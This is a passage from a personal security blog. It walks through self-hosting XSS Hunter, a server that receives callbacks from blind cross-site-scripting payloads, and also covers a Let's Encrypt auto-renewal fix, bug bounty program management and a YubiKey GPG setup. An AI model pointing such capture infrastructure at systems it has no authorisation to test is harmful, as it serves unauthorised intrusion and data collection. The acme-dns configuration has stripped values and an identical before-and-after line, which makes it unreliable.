(7) What is the postgres user's password? (ex. @!$%@^%UOFGJOEJG$) Postgres password: [YOUR_REALLY_SECURE_PASSWORD] (8) What is the postgres user's DB? (ex. xsshunter) Postgres DB: xsshunter Generating cookie secret... Minting new nginx configuration file... Setup complete! Please now copy the 'default' file to /etc/nginx/sites-enabled/default This can be done by running the following: sudo cp default /etc/nginx/sites-enabled/default Also, please ensure your wildcard SSL certificate and key are available at the following locations: /etc/nginx/ssl/mydomain.com.crt; # Wildcard SSL certificate /etc/nginx/ssl/mydomain.com.key; # Wildcard SSL key Good luck hunting for XSS!
Output of executing ./generate_config.py
You should now have 2 new files in your xsshunter folder:

config.yaml (contains API keys and credentials)

default (contains the nginx configuration)

NGINX configuration

Change SSL Certificate location

If you are also using Let's Encrypt, you will need to modify the default file.
In order to make the config work with Let's Encrypt default settings, we have to comment out all occurrences of:

/etc/nginx/ssl/mydomain.com.crt; # Wildcard SSL certificate
/etc/nginx/ssl/mydomain.com.key; # Wildcard SSL key

and replace it with

ssl_certificate /etc/letsencrypt/live/mydomain.com-0001/fullchain.pem ; # managed by Certbot
ssl_certificate_key /etc/letsencrypt/live/mydomain.com-0001/privkey.pem; # managed by Certbot

Notes

replace mydomain.com with your domain name!

Everything after # is just for comments. You can remove them if you want.

Your default file should look like the following now:

server { # Redirect HTTP to www listen 80; server_name mydomain.com; location / { rewrite ^/(.*)$ https://www.mydomain.com/$1 permanent; } } server { # Redirect payloads to HTTPS listen 80; server_name *.mydomain.com; proxy_set_header X-Forwarded-For $remote_addr; return 307 https://$host$request_uri; client_max_body_size 500M; # In case we have an extra large payload capture } server { # Redirect HTTPS to www listen 443; ssl on; # New conf ssl_certificate /etc/letsencrypt/live/mydomain.com-0001/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/mydomain.com-0001/privkey.pem; # managed by Certbot # Original conf #ssl_certificate /etc/nginx/ssl/mydomain.com.crt; # Wildcard SSL certificate #ssl_certificate_key /etc/nginx/ssl/mydomain.com.key; # Wildcard SSL certificate key server_name mydomain.com; location / { rewrite ^/(.*)$ https://www.mydomain.com/$1 permanent; } } server { # API proxy listen 443; ssl on; # New conf ssl_certificate /etc/letsencrypt/live/mydomain.com-0001/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/mydomain.com-0001/privkey.pem; # managed by Certbot # Original conf #ssl_certificate /etc/nginx/ssl/mydomain.com.crt; # Wildcard SSL certificate #ssl_certificate_key /etc/nginx/ssl/mydomain.com.key; # Wildcard SSL certificate key server_name *.mydomain.com; access_log /var/log/nginx/mydomain.com.vhost.access.log; error_log /var/log/nginx/mydomain.com.vhost.error.log; client_max_body_size 500M; location / { proxy_pass http://localhost:8888; proxy_set_header Host $host; proxy_set_header X-Forwarded-For $remote_addr; } } server { # Redirect api to HTTPS listen 80; server_name api.mydomain.com; # Subdomain for API server proxy_set_header X-Forwarded-For $remote_addr; return 307 https://api.mydomain.com$request_uri; client_max_body_size 500M; # In case we have an extra large payload capture } server { # Redirect www to HTTPS listen 80; server_name www.mydomain.com; location / { rewrite ^/(.*)$ https://www.mydomain.com/$1 permanent; } } server { # GUI proxy listen 443; server_name www.mydomain.com; client_max_body_size 500M; ssl on; # New conf ssl_certificate /etc/letsencrypt/live/mydomain.com-0001/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/mydomain.com-0001/privkey.pem; # managed by Certbot # Original conf #ssl_certificate /etc/nginx/ssl/mydomain.com.crt; # Wildcard SSL certificate #ssl_certificate_key /etc/nginx/ssl/mydomain.com.key; # Wildcard SSL certificate key location / { proxy_pass http://localhost:1234; proxy_set_header Host $host; } }
Our default-file after changing the certificate & key location
Enable NGINX config

The next step is to move the file into the nginx folder. It is considered good practice to have config files in .../sites-available and then symlink the configurations you are using to .../sites-enabled, so that is what we will do.
I also like naming the configuration file so I know what service it belongs to.

Following is how to do it!

# move file and give proper name cp xsshunter/default /etc/nginx/sites-available/xsshunter-mydomain.com # symlink the file to sites-enabled to make it active ln -s /etc/nginx/sites-available/xsshunter-mydomain.com /etc/nginx/sites-enabled/xsshunter-mydomain.com # test for errors in the configuration sudo nginx -t # if no errors, restart nginx for changes to take effect sudo systemctl restart nginx
Enabling the NGINX config

If you have never ran nginx before, the last command should be the following instead:
sudo systemctl start nginx

Installing the API server

First, the API server needs certain dependencies as well.
The guide said to run the following command:

sudo apt-get install python-virtualenv python-dev libpq-dev libffi-dev

Please execute it.

Unfortunately, that did not allow me to run the virtualenv command, so I installed it using the following command:

pip install virtualenv

That resolved the issue and allowed me to continue.
Let's proceed by moving into the right directory.
Once in the right directory, we need to create our virtual environment.
Here is how to do so:

# change folder - you know that already! cd xsshunter/api # find your Python2 executable path which python2 # create a python2 virtual environment in the env folder virtualenv -p MY/EXECUTABLE/PATH env
Change to /api folder and create virtual environment

Please make sure that you change MY/EXECUTABLE/PATH in the last command to whatever the output of the which python2 was. For me it was /usr/bin/python2.

After we have made the virtual environment, activate it by using the following command. You should see your command line change.

# activate environment . env/bin/activate
Activate virtual environment
The terminal indicates the virtual environment by adding (env)
There are also some dependency issues since the repository is not actively maintained.
As such, we have to make the following changes in requirements.txt:

psycopg2==2.6.1 => psycopg2==2.7.3.1

bcrypt==2.0.0 => bcrypt==3.1.7

Use your favorite text editor to achieve the above. I use VIM.
Once that is done, it is time to install all dependencies and run the API server to make sure everything is working as expected. Let us try!

# install requirements pip install -r requirements.txt # run the API server ./apiserver.py
Install requirements and run server
The install command should print some data. The api-server should not output anything. No output is good news!

We want to make one more change before we have finished setting up the api server. Originally it listens on interface 0.0.0.0 but we are proxying through NGINX, meaning there is no point in doing so. We will change it to listen on localhost instead. This avoids confusion and any potential issues.

Using a text editor, change line 684 in apiserver.py from
app.listen( 8888 ) to app.listen( 8888, "localhost" )

Thanks to swarley7, for sharing this in this pull request

Finally: There is a bug where uploads does not work properly, if the /uploads folder does not exists. It is shared by sampsonc in this pull request.
Let us create the folder, then move on!

# create uploads folder mkdir xsshunter/api/uploads
Create uploads folder to avoid errors when storing screenshots
Installing the GUI server

This process is very similar to that of the api server, just easier.

We change into the gui folder, create a virtual environment, activate it, and install the requirements.

# change folder - you know that already! cd xsshunter/gui # find your Python2 executable path which python2 # create a python2 virtual environment in the env folder virtualenv -p MY/EXECUTABLE/PATH env # activate environment . env/bin/activate # install requirements pip install -r requirements.txt # run the GUI server ./guiserver.py
Install and run the GUI server
Again, the same as when installing the API server:

Please make sure that you change MY/EXECUTABLE/PATH in the last command to whatever the output of the which python2 was. For me it was /usr/bin/python2

Here too, no output when running ./guiserver is good news.

Also, similarly to the API server we want to proxy all connections through NGINX, so there is no need for the server to listen on the 0.0.0.0 interface.

Using a text editor, change line 70 in guiserver.py from
app.listen( 1234 ) to app.listen( 1234, "localhost" )

Final touches

The first step is to run both servers. The original blog post suggest using tmux. It is not ideal for production, but hey, we're hackers so let's do it anyways ! If you want a more stable service, I will leave it as an exercise for you.

Here is how to run it using tmux. If you need some help, this is a really good cheatsheet!

# start a session tmux session -new xsshunter # change to api directory cd xsshunter/api #run api server ./apiserver # open new pane [ctrl]+[b] -> [c] # change to gui directory cd xsshunter/gui # run gui server ./guiserver # detach from session [ctrl]+[b] -> [d] # extra: if you want to open the session again tmux attach-session -t xsshunter
Run the server in tmux
Only one thing left to do

Access your domain and see if you are greeted with the xsshunter page!

It should look just like the front page of xsshunter.com

You did it?

Congratulations!

Time to celebrate with a beer!

If you haven't watched Entourage yet, do yourself a favor and celebrate your success by starting now!

Final note

I don't like running things as root / normal users, so in order to run this as www-data I made the following script to make running it a little easier.
Replace apiserver.py with guiserver.py to have one for each server. Feel free to use it!

#!/bin/sh . env/bin/activate && python apiserver.py
Shell script for using the virtual environment and running the API server
# execute script above as www-data user sudo -u www-data ./run.sh
Run script as www-data for security reasons
DONE!

Thank you for reading, I hope this was helpful!

As always, have a puppy picture for your effort!
Until next time!

Cheers!

I sleps!

Automatically renew Let's Encrypt Wildcard Certificates

Robin Lunde — Sat, 25 Apr 2020 13:44:19 GMT

Hey again!
This will be a short post just troubleshooting issues from another guide.
There are many different services that automate this process, but unfortunately Namecheap does not support any such automation. As such, some hacky solutions are required.
Before I begin, thanks to the creator of the blog post, Bryan C. Roessler & the creator of acme-dns, Joona Hoikkala!
I won't go into too much details, as everything except a few core pieces are very well explained here!
So, what can possibly go wrong following the guide above?
My issue was that systemd-resolved was already running on port 53.
The following had little effect:
Disabling the service - This lead to DNS resolution failing. Not very surprising.
Changing systemd-resolved to utilize 127.0.0.1 for DNS lookups. I tried many ways, but primarily through resolv.conf / resolved.conf. I restarted services and tried various way to get DNS to be resolved through ACME-DNS, just for the purpose of automatically renewing the certs.
I started troubleshooting according to the github page.
Running everything manually quickly showed :53 could not be bound to localhost, or 0.0.0.0. (like I did not already know this at that point)
I disabled systemd-resolved and followed these steps to check if there was any issues with the service itself. Everything worked as expected.
Being frustrated and angry at spending 4 hours trying to set up automation that should be simple, I decided to try to just bind the server to my public IP.
Surprisingly though, it worked wonders! Out of the blue, everything worked as expected.
That means, in order for the service to run properly as indicated in the guide linked above, change the acme-dns configuration file from:
listen = ":53"
to
listen = ":53"
See below for a complete example of the file. As mentioned in the original post, remember to change to whatever you domain name is and to whatever public IP your machine has.

[general] # DNS interface - CHANGES BELOW! listen = ":53" protocol = "udp" # domain name to serve the requests off of domain = "acme." # zone name server nsname = "ns1.acme." # admin email address, where @ is substituted with . nsadmin = "admin." # predefined records served in addition to the TXT records = [ "acme.. A ", "ns1.acme.. A ", "acme.. NS ns1.acme..", ] debug = false [database] engine = "sqlite3" connection = "/var/lib/acme-dns/acme-dns.db" [api] api_domain = "" ip = "127.0.0.1" disable_registration = false autocert_port = "80" port = "8081" tls = "none" corsorigins = [ "*" ] use_header = false header_name = "X-Forwarded-For" [logconfig] loglevel = "debug" logtype = "stdout" logformat = "text"
#/etc/acme-dns/config.cfg
After which all was good in the world.
As a bonus, I also threw together a very short bash script, to enable the service and open ports only while renewing the certificate. Nothing fancy, but makes it a little safer.
Shell script is as follows, and installed as a cronjob. I am sure there is a better way to implement this, but hey, it works!
#!/bin/bash checkstatus() { if [[ $1 != 0 ]]; then echo "$(date) - Command $2 did not complete successfully!" >> /var/log/cert_renew.log fi } sudo ufw allow 53/udp && sudo ufw reload checkstatus $? "UFW allow & restart" sleep 2 sudo systemctl start acme-dns.service checkstatus $? "Start acme-dns" sleep 5 /usr/bin/certbot renew --post-hook "systemctl reload nginx" >> /var/log/letsencrypt/renew.log checkstatus $? "certbot renew - check /var/log/letsencrypt/renew.log" sleep 5 sudo systemctl stop acme-dns.service checkstatus $? "Stop acme-dns" sudo ufw delete allow 53/udp && sudo ufw reload checkstatus $? "UFW delete & restart"
renew.sh
Also gives a nice little log in case something goes wrong.
Hope this short write-up helped, in case you ran into similar issues.
Until next time,
Cheers!

Bug Bounty program Management: A different perspective

Robin Lunde — Tue, 21 Apr 2020 14:27:06 GMT

In this post I want to share my thoughts about how to run a bug bounty program from a non-technical perspective. There are many resources out there for a more technical approach, so I wanted to offer a different view. If you want to dive into the technical details as well, check out the resources at the bottom of the article.
Perspective is important!
Content

Internal Organization

Management

Organization

External interactions

Reporting

Communication

Cooperation

1. Internal Considerations
There is little point in having a program, if you cannot deal with the issues that you receive! The basis of a good program is having a good team.

1.1 Management

To run a program well, you also need to manage the internal team well. There are a few core focus areas that are especially important for achieving this.

The first is to have activities scheduled. Running a program is by nature variable, the flow of reports is always changing. As such the engineers need to have tasks ready in the case that there is downtime.
Examples for activities are:

Testing internal systems

Documenting previous cases

Performing root cause analysis of received issues

The same is true for the opposite! You need to have a plan ready for how to handle a sudden flood of reports. I also want to point out that you should still have dedicated team members, even though there may be downtime. This is to ensure that lower impact reports also get processed in a timely manner. Not having a dedicated team can lead to long handling times for low impact issues due to other tasks having higher priority.

Dwight D. Eisenhower
The second is have clear role assignment. It is easy to have all engineers jump on exciting tasks with nobody picking up more trivial reports. Having members be in charge of reports and following them up is critical to run an efficient team. It also helps with making sure reports get resolved. It avoids everyone focusing on a single issue. That member also knows how the exploit worked, so they can confirm that the issue is properly resolved.

Finally, having a set format for reporting issues is critical to communicate well with developers. The impact and time to resolution for the given issue needs to be clearly stated. This reduces friction and results in everyone being on the same page.
All parties involved know what to expect!
This allows for a smooth escalation of both critical and minor issues. It also avoids confusion or placing blame which can happen in high pressure situations.

1.2 Organization

It is also important for the team to be organized well. It allows for rapid responses and sets the team up for success. As mentioned above, there will be both downtime and busy periods, so the team needs to be flexible.

The team should have tasks that do not have strict deadlines and can be paused while triaging reports. Penetration testing internal tools and services is a good example of this type of tasks. The risk is low since only employees have access. It usually requires local network access, which further reduces risk. It is an important aspect of defense-in-depth though, and should not be neglected. Another task that is well suited is doing risk assessments for low priority services.

The skillset and tools required to do well in bug bounty resembles those of an internal red team. The types of work are also compatible, since internal red teams rarely have urgent tasks. They also work with the CSIRT team regularly, reducing friction when having to do incident response for a report.

What can be automated, should be automated!
Applying automation to the following actions is a must for smooth operations:

Ticket creation

Member assignment

Ticket status updates

What it feels like without proper automation
Automation also removes the chance of human error occuring. The more human interactions, the higher the chance of a mistake.
Therefore human input should be kept at at minimum, especially for processes dealing with sensitive data.
An example flow is as follows:
Receive human input -> Double check (verify / reject only) -> Output
A perfect illustration of where to apply this is for bounty payouts. The application can be as follows:
Team member A inputs bounty -> Team member B confirms sum -> Bounty is paid

Manual work is the killer of motivation, efficiency and robustness. You should strive towards having a system where the team can focus on the following tasks:

Triaging the report

Verifying the fix

Communicating with the reporter

Deciding the bounty

Tasks that are unrelated to engineering should be kept to a minimum. Here are a few examples:
Identifying which department is in charge of a service
Identifying which part of the code is vulnerable
Preparing the paperwork for paying out bounties

These tasks are menial and you can easily automate them at scale.

If you are considering starting a program you should set up this automation before receiving your first report!

2. External interactions
What is shared externally defines how your program is perceived. It is hard to decide on bounty ranges and scope. Yet it pales in comparison to communicating well with reporters.

2.1 Reporting

The communication naturally starts when you get a report. Being pre-emptive and telling the reporters what you want to know and how you want it to look is extremely helpful.

Understanding the report can often be more difficult than fixing the bug itself!

Knowing what to expect from the content of a report reduces the frustration for the team receiving the report. All triagers have received a report where the content is all mixed up, making it hard to understand the issue. A good format also makes it easier to understand the content at a glance. This sets you up to succeed. The team is happy and the chance of the report being resolved fast increases.

A good template can be found here

I prefer this format:

Overview

Summary

Impact

Details

PoC

Mitigation / Prevention

Testing Environment

In the Testing Environment section you should add:
Special headers, User Agent, IP address, App version, etc.
This makes it easier for the triaging team to identify your testing when checking logs.

2.2 Communication

First of all, respond!
Being ghosted sucks. Keeping hackers up to date is important, but time consuming. Rather than trying to treat the conversation as a casual chat, set expectations and follow through on the promises you make.
Tell them when you will get back to them. If they don't hear back by then, they will remind you. If reporters nag about the status of reports, you are likely not setting expectations properly. It can be annoying, but understand it is likely due to giving vague replies and not following up properly.

This is what you want every hacker to think!

Furthermore, setting expectations and not following through is the same as not replying. If you say you will get back to the reporter this week, you have to reply this week! You don't have to resolve the issue, but at least give a simple update. Even if you have no new information, let the reporters know they haven't been forgotten.

There are also 3 core principles I like to use when communicating with reporters (and triagers):

Be kind

Be polite

Be firm

Give people the benefit of the doubt! If you are angry or frustrated, let someone else handle the report or do it once you've calmed down. Treat people with respect.

The second point I regard as common courtesy. The reporters / triagers are not your friends, and if they are, you are in a professional setting. Nobody expects a formal letter, but it is usually not appropriate with emojis, 1337 h4x0r terms, etc. either.
Make your report easy to understand!

For the third point, make it clear what is and isn't accepted. You are already giving reporters the benefit of the doubt. If you have explained why the report is not considered valid twice already, it is OK to say:

Unless you can show further impact via PoC, we now consider this report closed.

It clearly conveys what is expected and allows everyone involved to spend their time efficiently.

It is hard to find the correct balance between enabling discussions and being firm. I usually live by three time's and you're out! What I mean by that is, I will discuss the same issue at most 3 times:

The first time I will explain in depth.

The second time I will clarify and explain in other words.

The third time I will clarify and end the discussion.

It gives a nice balance between providing proper context while avoiding long arguments. As with all things, exceptions apply!

Help reporters provide value!
Another important aspect is encouraging members to give guidance to reporters submitting low quality reports. Someday, the reporter might come back after having learned more and find a critical bug.
Don't just reply Out Of Scope, No Impact or Invalid!
Describe why you consider it as such, so reporters learn how to contribute to your program. By explaining your evaluation, you can help them towards providing valuable reports. If they do not agree with your assessment, they can focus on programs that better align with their views, leading to less noise for your team.

This helps avoid the scenario where reporters keep submitting reports of no value to your program, wasting everyones time.

2.3 Cooperation

This is both the easiest and the hardest to achieve. Try to remember and understand that both sides hopefully have the same goal - to fix the issue! Keeping this in mind when interacting is important.
Try to think of what it would be like if you were on the other side - regardless if you are the reporter or the triager.

It is frustrating to try to explain an issue to someone who does not understand. Especially after repeated attempts to do so. You are just trying to help!

On the other hand it is also frustrating to try to explain that your organization does not consider an issue valid. There is no point in arguing your report is valid if the triage team understands the issue and tells you otherwise. Typical examples are Google Maps API keys and Open Redirects with no further security impact.

I often feel this is an accurate representation of the mindset of many bug bounty hunters - myself included!
It is important - from both sides - to remember that reporters are sharing potential issues to an organization. The organization can then decide if they consider it an issue or not.
Acting in good faith means that the organization should seek to reward those who contribute, but they are not obliged to do so. You volunteered to look for bugs in their service!

As reporters, it is important that we remember that we are not entitled to a reward! As triagers, it is important to keep in mind that a person spent their time trying to assist your company (regardless of the quality of the report).

Instead of thinking of it as us and them, reporters and triagers, we are one team!
We work together towards providing safer services!

In closing I would like to clarify that this is the ideal image that I think programs should aim for. It is not realistic to expect perfection in every situation. Instead we should all look for continued improvement and learning.

If you got this far, thanks for reading! As thanks, here's a puppy picture!
Storm says thank you for reading!
Cheers!
As promised here are the resources that discuss bug bounties from a technical approach:
Coordinated Vulnerability Disclosure: You’ve Come a Long Way, Baby - RSA - Katie Moussouris & Chris Wysopal
The Bug Bounty Guide - EdOverflow
Reported to Resolved: Bug Bounty Program Manager - PascalSec interviewed by InsiderPhd
Setting up bug bounties for success - lcamtuf
Sharing the Philosophy Behind Shopify's Bug Bounty - Shopify

YubiKey 5 Setup

Robin Lunde — Sat, 02 Mar 2019 08:27:00 GMT

So, this is going to be a write-up for Yubikey 5. I had some trouble setting it up and figured it would be nice to do a write-up. It is quite similar to the process with Yubikey 4, with minor changes. This guide will be using Ubuntu-based Linux, but the process should be similar on Mac. This guide is quite similar to this, with minor differences because of having a newer Yubikey.
As a sidenote, if you want one, how about participating in the LINE Bug Bounty program? (Check out the SWAG section!)
NB: This was done with a Yubikey 5 NFC+
Part 1 - Preparation

1. Install YubiKey dependencies:

Link

I also had to add YubiKey-Manager, like this:
$ sudo apt-get install yubikey-manager

2. Set up pin codes.

I set up the codes for my key using GUI on windows.

There are also alternatives available for other operating systems.

You can find the software here.

For Windows, you can set the pin-codes here:

Default PIN is 123456, Default PUK is 12345678.

It can also be done from command line (Google is your friend!)

3. Generate a secure password for your new Private Key.

NOTE: This key should be kept secret. Nobody except you should have access to this key and it should not be easy to get a hold of!

Generate it like this:
$ gpg2 --gen-random -a 0 24

Preferrably keep it in a password-manager or on paper somewhere only you have access to.

4. Set saving location to USB

I assume you will be saving a backup on a USB device. If not, you still need a backup folder, so you should create a folder that will work as a backup. You will see why later, trust me!

I did this by using a symlink from my ~/.gnupg folder to my USB device, like this:

Rename original folder
mv .gnupg .gnupg_orig

Create symlink
ln -s [USBLOCATION] .gnupg
Mine looked like this on Linux Mint:
ln -s /media/robin/usb .gnupg
(You can find the path of your USB device by following this Guide)

5. Generate the private key

NOTE: For newer Yubikey (Yubikey 4 or higher, I believe), gpg2 is required!
NOTE: When generating keys, you have to supply a passphrase for the generated key, as illustrated here:

$ gpg2 --expert --full-gen-key

Select option 8

Turn off encryption functionality (E)

Turn on signature functionality (S)

Continue (Q)

Select key size (4096)

Set no expiry date (0)

Create key (y)

Confirm (o)

Enter key phrase as generated in step 3.

If you also run in to some errors like this gpg: can't connect to the agent: IPC connect call failed, you are not alone!

Code for fixing the issue:
$ pkill -9 gpg-agent
$ printf '%%Assuan%%\nsocket=/dev/shm/S.gpg-agent\n' > ~/.gnupg/S.gpg-agent
$ source <(gpg-agent --daemon)

(See Link1 and Link2 for more details)

6. Set a variable that stores the ID of the generated key, for your own sanity

$ export KEYID=xxxxxxxx

The ID of the key is shown here:

7. Part 1 = Complete! Good job!

Part 2 - Generate the keys for the Yubikey

1. Generate keys

NOTE:
When you generate keys, you have to provide a passphrase for the new key, as shown in the image provided in Part 1 - Section 5.
You also need to provide the passphrase for the private key (as generated in part 1), as illustrated here:

1.1 Begin with executing this command, to generate sub-keys based on the private key generated in Part 1.

$ gpg2 --expert --edit-key $KEYID

1.2 Create a signing key:

$ addkey

Select RSA Sign Only (4)

Select 4096 bits key size (4096)

Select how long the key should be valid for (1y)

Confirm correct choice (y)

Confirm key creation (y)

1.3 Repeat the same procedure, but create an encryption key instead.

$ addkey

Select RSA Encrypt Only (6)

Select 4096 bits key size (4096)

Select how long the key should be valid for (1y)

Confirm correct choice (y)

Confirm key creation (y)

1.4 Repeat once more, this time creating an authentication key. This is the last one!

$ addkey

Select RSA (Set your own capabilities) (8)

Disable signing capability (S)

Disable encryption capabilities (E)

Enable authentication capabilities (A)

Finish (Q)

Select 4096 bits key size (4096)

Select how long the key should be valid for (1y)

Confirm correct choice (y)

Confirm key creation (y)

1.5 SAVE!!!!!!!!

$ save

2. Verify that your keys are saved.

$ gpg2 --list-secret-keys

3. All good? Good! Make a copy of all the created keys!

Export the master sub key
$ gpg2 --armor --export-secret-keys $KEYID > master_sub.key

Export all sub keys
$ gpg2 --armor --export-secret-subkeys $KEYID > sub_keys.key

NOTE: These commands export the keys to the current directory! Change the path after ">" to where you want to store them. As an example, for the first command I used:
$ gpg2 --armor --export-secret-keys $KEYID > /media/robin/usb/master_sub.key

4. BACKUP KEYS!

Make sure you copy the keys to at least one other location. When moving the keys to the Yubikey, they will be removed from the original stored location. (The operation is destructive .)

If you did it like me and followed the instructions in Part 1 - Section 4, this is as easy as renaming the symlink we created and copying the USB contents to the original .gnupg folder.

$ mv ~/.gnupg ~/.gnupg_usb - Rename symlink folder

$ mv ~/.gnupg_orig ~/.gnupg - Restore original folder

$ cp -r [USBLOCATION] ~/.gnupg - Copy contents on the USB to the original .gnupg folder. [USBLOCATION] should be the same as in Part 1 - Step 4

NOTE: This assumes you have no pre-existing GPG-keys. If you do, please move them to another folder before doing this operation.

I also recommend storing other sensitive data that you may forget on the USB before removing it. Things like passwords, pins, etc. I stored these in a simple text file named something like IMPORTANT.txt This is OK, since we intend to keep this USB stored in a safe location.

If you are worried about it being insecure, you can encrypt the USB, use a different USB for storing the important information, or write it down with pen & paper. For encryption advice, see this link.

5. Remove USB and store in a safe place!

Part 3 - Transfer keys to device

NOTE: This following section is the same as in drduh's guide. As such, I have included the commands here, but if you want to see example output, please follow the added links.
WARNING:
This operation is destructive!If you do not have a backup, your keys will be moved to the Yubikey and removed locally. Keys cannot be extracted from the Yubikey!

1. Set Yubikey information

$ gpg2 --card-edit
$ admin - Activate admin role
$ name - Set owner name
$ lang - Set preferred language
$ login - Set login credentials (e-mail etc.)
$ quit - Finished!

Example output

2. Move keys

2.1 Enable editing key

$ gpg2 --edit-key $KEYID

Example output for 2.1

2.2 Select and move key 1 (Signing key)

$ key 1
$ keytocard

Example output for 2.2

2.3 Deselect the transferred key and select the next one to transfer

$ key 1
$ key 2
$ keytocard

Example output for 2.3

2.4 Repeat as above, but with 2 and 3 respectively, instead of 1 and 2.

$ key 2
$ key 3
$ keytocard

2.5 Save the transferred keys to the Yubikey

$ save

Example output for 2.4 & 2.5

2.6 Store public key on disk

$ gpg2 --armor --export $KEYID > pubkey.txt (Stores pubkey.txt in current folder)

2.7 OPTIONAL Upload public key to a key server

$ gpg2 --send-key $KEYID
$ gpg2 --keyserver pgp.mit.edu --send-key $KEYID
$ gpg2 --keyserver keys.gnupg.net --send-key $KEYID
Example output for 2.6 & 2.7

3. Cleanup

Remove .gnupg folder
sudo rm -r .gnupg

Part 4 - Final points

The pubkey.txt file is needed for actually using the Yubikey later on, so keep it somewhere easily available. It is not sensitive, so anywhere is OK.

I plan to write a follow-up post on how to use the Yubikey with SSH, once I get the time to do so, so please check that out once it is available !

This guide was only possible thanks to the following resources. All credit to the respective creators and contributors!

Please ask if you have any issues or questions!

References:

https://michaelheap.com/gpg-cant-connect-to-the-agent-ipc-connect-call-failed/

https://stackoverflow.com/questions/46673717/gpg-cant-connect-to-the-agent-ipc-connect-call-failed/47056403#47056403

https://github.com/drduh/YubiKey-Guide

https://www.esev.com/blog/post/2015-01-pgp-ssh-key-on-yubikey-neo

https://docs.kali.org/faq/how-do-i-tell-what-drive-path-my-usb-drive-is-on

Welcome

Robin Lunde — Fri, 12 Oct 2018 14:50:58 GMT

Welcome to Robin's random rants!
As you may already know my name is Robin Lunde. I just finished my Master's degree, and now I am working for LINE (Check it out - Play store, App store).
This web-page is 50% for the sake of me testing technology, trying out new things and getting practical experience. The other 50% is for me to share some of the things I learn at work and in life in general, in case anyone is interested.
Unfortunately, I am quite busy these days starting my new job, but hopefully the content will be coming soon. Until then, feel free to explore my web-page or send me a message.
Finally, the picture in this post is an edit from when I was doing my Master's and accurately portrays what it feels like when I get into the programming and lose track of everything around me (I doubt I am alone in this!).
Thanks for reading, until next time!
Robin

Robin Lunde's random blog

CVE-2025-62172

Table of contents:

Personal Thoughts

How do I look for these types of issues?

Technical details

Non qualifying vulnerabilities:

HackTheBox - ServMon

Motivation

Summary:

Detailed walkthrough

NMAP

Installing XSS Hunter

UPDATE: NEW AND AMAZING THINGS HAVE HAPPENED:

Why?

How?

Initial steps

Installing XSS Hunter

Getting a mailgun account

Confirm that it works

Setting up dependencies

Install the service

Configure the service

NGINX configuration

Change SSL Certificate location

Enable NGINX config

Installing the API server

Installing the GUI server

Final touches

Access your domain and see if you are greeted with the xsshunter page!

Congratulations!

Final note

DONE!

Automatically renew Let's Encrypt Wildcard Certificates

Bug Bounty program Management: A different perspective

Content

1. Internal Considerations

1.1 Management

1.2 Organization

2. External interactions

2.1 Reporting

2.2 Communication

2.3 Cooperation

YubiKey 5 Setup

Part 1 - Preparation

1. Install YubiKey dependencies:

2. Set up pin codes.

3. Generate a secure password for your new Private Key.

4. Set saving location to USB

5. Generate the private key

6. Set a variable that stores the ID of the generated key, for your own sanity

7. Part 1 = Complete! Good job!

Part 2 - Generate the keys for the Yubikey

1. Generate keys

1.1 Begin with executing this command, to generate sub-keys based on the private key generated in Part 1.

1.2 Create a signing key:

1.3 Repeat the same procedure, but create an encryption key instead.

1.4 Repeat once more, this time creating an authentication key. This is the last one!

1.5 SAVE!!!!!!!!

2. Verify that your keys are saved.

3. All good? Good! Make a copy of all the created keys!

4. BACKUP KEYS!

5. Remove USB and store in a safe place!

Part 3 - Transfer keys to device

1. Set Yubikey information

2. Move keys

2.1 Enable editing key

2.2 Select and move key 1 (Signing key)

2.3 Deselect the transferred key and select the next one to transfer

2.4 Repeat as above, but with 2 and 3 respectively, instead of 1 and 2.

2.5 Save the transferred keys to the Yubikey

2.6 Store public key on disk

2.7 OPTIONAL Upload public key to a key server

3. Cleanup

Part 4 - Final points

References:

Welcome

Welcome to Robin's random rants!